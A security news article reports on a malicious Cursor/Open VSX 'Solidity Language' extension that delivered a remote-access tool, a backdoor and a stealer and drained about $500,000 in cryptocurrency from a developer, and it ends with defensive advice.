Hackers Steal $500K in Crypto Using Malicious AI Browser Extension

A sophisticated cyberattack has resulted in the theft of approximately $500,000 in cryptocurrency from a Russian blockchain developer, highlighting the persisting and evolving threats posed by malicious open-source packages.

Despite increased awareness and vigilance among the developer community, attackers continue to exploit public repositories and ranking algorithms to trick even experienced users into installing malicious software.

Fraudulent Extension Exploits

The incident came to light in June 2025, when the victim an experienced developer who had recently reinstalled his operating system and only used essential, well-known applications noticed his crypto assets had been drained, despite rigorous attention to cybersecurity.

Investigators traced the breach to a Visual Studio Code-compatible extension called “Solidity Language” for the Cursor AI IDE, a productivity-boosting tool for smart contract developers.

The extension, distributed via the Open VSX registry, masqueraded as a legitimate code highlighting tool but was, in reality, a vehicle for remote code execution.

Upon installation, the rogue extension executed a JavaScript file, extension.js, which connected to a malicious web server to download and run PowerShell scripts.

These scripts, in turn, installed the legitimate remote management tool ScreenConnect, granting the attackers persistent remote access to the compromised system.

The attackers leveraged this access to deploy additional VBScripts, which fetched further payloads including the Quasar open-source backdoor and a stealer module capable of siphoning credentials and wallet passphrases from browsers, email clients, and crypto wallets.

Blockchain Developers Targeted

The ruse was convincing: the malicious extension appeared near the top of search results within the extension marketplace, thanks to a ranking algorithm that weighted recency and apparent activity over simple download counts.

The attackers also copied descriptions from legitimate packages to further blur the line between authentic and malicious offerings.

When the fake extension failed to provide its promised functionality, the victim initially assumed it was a bug, allowing the malware to persist undetected.

In a further twist, after the malicious package was removed from the store, the threat actors quickly published a new clone named “solidity,” using sophisticated impersonation tactics.

The malicious publisher’s name differed by only a single character an uppercase “I” in place of a lowercase “l” a distinction almost impossible to spot due to font rendering.

Download counts for the fake extension were artificially inflated to two million in an attempt to outshine the legitimate tool, making the correct choice difficult for users.

The campaign did not end there; similar attack methodologies were identified in additional malicious packages on both the Open VSX registry and npm, targeting blockchain developers through recognizably named extensions and packages.

Each infection chain followed a familiar pattern: executing PowerShell scripts, downloading additional malware, and establishing communication with attacker-controlled command-and-control servers.

This incident underscores the enduring risks of supply-chain attacks in the open-source ecosystem.

Security experts recommend that developers use commercial-grade endpoint protection, rigorously verify extension authorship, scrutinize unexpected behaviors, and inspect downloaded source code for anomalies.

The case serves as a stark reminder that even seasoned developers can fall victim to well-concealed threats in public repositories.

Indicators of Compromise (IOC)

Find this Story Interesting! Follow us on Google News, LinkedIn, and X to Get More Instant updates